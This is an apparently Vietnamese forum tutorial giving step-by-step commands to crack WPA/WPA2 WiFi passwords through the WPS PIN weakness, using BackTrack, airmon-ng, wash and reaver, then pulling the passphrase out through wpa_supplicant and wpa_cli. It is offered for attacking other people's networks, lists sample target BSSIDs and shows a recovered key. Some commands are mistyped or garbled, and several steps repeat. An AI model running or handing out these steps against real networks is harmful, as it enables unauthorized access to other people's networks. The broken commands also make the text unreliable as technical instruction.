1. Login Backtrack as root
2. Update Reaver ( phiên bản mới nhất Backtrack 5R3 đã update Reaver 1.4)
mở Terminal lên gõ lệnh: apt-get update chờ chạy xong gõ tiếp apt-get install reaver
3. Chuyển chế độ card wifi sang chế độ monitor
Gõ lệnh : " iwconfig " để tìm tên của card mạng .Nhưng đa số các card mạng latop đều tên là "wlan0"
Chuyển card mạng của bạn qua chế độ monitor mode bẳng lệnh : " airmon-ng start wlan0 " khi bạn thấy trên màng hình hiện lên : monitor mode is enable on mon0 là thành công.
4. Lấy danh sách AP và thông số BSSID của AP cần hack:
Dùng lệnh " airodump-ng mon0 " để hiện danh sách AP quanh chỗ bạn
Dùng lệnh " wash -i mon0 -C " để liệt kê danh sách AP hỗ trợ hack và trạng thái WPS
Chọn lấy cái nào có WPS Lock là No rồi copy BSSID của nó ra 1 chỗ khác.
5. Tiến hành attack:reaver -i mon0 -b "BSSID tìm đc" -vv
Trong quá trình attack phát sinh lỗi thì có thể tham khảo thêm các option của reaver bằng cách gõ mỗi lệnh reaver rồi enter. Hack 1 pass WPA2 mất tầm 4-10 tiếng nên bạn nào có điều kiện cắm máy thử xem nhé
Nếu trong trường hợp bạn hack mà ko ra pass mà nó ra dạng này.
[+] WPS PIN: '09104563' ( ví dụ thế)
[+] WPA PSK: 'd53656613b6cddbea716a88c16d157990904ea363629b4b4b 480aa74634dae6f'
Cái wpa PSK ko ra pass. thì bạn làm như sau.
Tạo file
wpa_supplicant.conf t-->/etc/wpa_supplicant.conf
Và thêm mấy dòng như sau.
--ctrl_interface=/var/run/wpa_supplicantctrl_interface_group=0update_config=1--Mở teminal start wpa_supplicant bằng dong lênh.
wpa_supplicant -Dwext -iwlan0 -c/etc/wpa_supplicant.conf –BMở 1 terminal khác gõ wpa_cli --> enter
bạn gõ status sẽ thấy thông báo wpa_state=INACTIVE
bạn nhập vào wps_reg xx:xx:xx:xx:xx:xx 12345678 Với xx.... là BSSID của wifi và 12345678 là mã PIN>
Bạn sẽ thấy chứ OK xuất hiện
Bạn nhìn sang bên cửa sổ terminal kia có xuất hiện chữ CTRL-EVENT-CONNECTED. Thì thoát wpa_cli. và gõ dhclient wlan0 để nó lấy IP từ wifi .
Rồi bạn có thể gõ save --> xuất hiện OK để lưu file wpa_supplicant.conf
bạn
cat /etc/wpa_supplicant.conf Để xem pass :D
---------------------------------------------------------------
Hack wifi này dựa trên lỗi bảo mật Wps bằng cách lấy mã Pin của Modem và giải mã thành ký tự pass . Để biết chức năng WPS của máy có hoạt động hay không ta mở Shell và đánh lệnh wash -i mon0 . Nếu nó thông báo enable thì ok . Còn thông báo locked chức năng wps thì đành chiu không hack được .
mo shell và nhấn nút lệnh để vào màn hình destop
ls
tiep theo
tar zxvf reaver-1.4.tar
danh tiep lenh
cd reaver-1.4
danh tiep :
cd src/
./config
danh tiep
./configure
danh tiep :
make
danh tiep
make install
iwconfig wlan0 down
airmon-ng start wlan0
các buoc tien hành nhu sau :
ban dau kiem tra card mang wifi :
mo shell 1 :
iwconfig
tiep theo go tiep lenh sau :
airmon-ng start mon0
chuong trình thông báo tìm duoc môt tien trinh :
tiep theo
danh tiep lenh :
airodump-ng wlan0
chuong trinh se bat dau do cac mang co xung quanh .
cac ban nhan CTRL + C để xuống dòng root@root:-#
sau do ta click phai chuot de chon mot dia ch? BSSID
vd : toi dang can hack dia chi la 00:1D

1:3A:88:30 , click phải chuột để copy địa chỉ Bssid :
tiep theo ta dung dong lenh :
apt-get update
mo mot shell khac :
danh lenh :
ifconfig
danh tiep lenh
ifconfig eth0 down
danh tiep lenh
ifconfig eth0 up
danh tiep lenh
dhclient -r
danh tiep lenh
dhclient
danh tiep lenh clear
cac buoc tren de kiem tra ket noi cac goi du lieu nhan duoc
ta tiep tuc tien hanh
ta quay tro lai man hinh chinh :
bang nut lenh :
airodump-ng mon0
danh tiep lenh :
clear
danh tiep lenh :
apt-get update
cac goi du lieu bat dau nhan : doi no tien hanh den 100%
ta danh tiep lenh :
clear
ta danh lenh :
apt-get install reaver
ta danh lenh :
clear
ta danh lenh :
reaver -1 mon0 -b 00:1D

1:3A:88:30 ( bssid)
hien thong bao waiting for beacon from 00:1D

1:3A:88:30 nhan Y de chap nhan .
tiep tuc danh lenh :
reaver -1 mon0 -b 00:1D

1:3A:88:30 -vv
chuong trinh hien thong bao Swiching mon0 to channel 1- chanel 8
cac ban luu y dong :trying pin 12345670 . can them du lieu de hack
nhan CTRL+C
danh lenh
clear
tro lai man hinh chinh airodump-ng mon0
that ra den day la hoan tat cac ban chi can cho trying pin du du di lieu la co the thay duoc ma
trong luc cho cac ban co the hack them mot so mang khac
thi du bang nut lenh :
reaver -1 mon0 -b 58:6D:8F:9F:99:1F -vv
khi da xac dinh duoc Ap ( assess point ) chuong trinh hien bang thong bao
detected APrate limiting , waitting 60 seconds before re-checking
nhan enter va doi :
ta danh lenh clear
tro lai man hinh chinh airodump-ng mon0
trong luc cho doi ta do xem co card mang ket noi chua :
bang nut lenh ban dau :
iwconfig
ta vao kiem tra card mang vao wcd netword manager
cac ban vao properties cua mang can hack :
luu y danh dau check vao o use Encryption de hien key wpa 1/2
key tim duoc danh vao o trong : toi tim duoc key la : shewmaker
nhan Ok
roi connect
vao web xem thu , xong . Mang da ket noi . chuc cac ban thanh cong .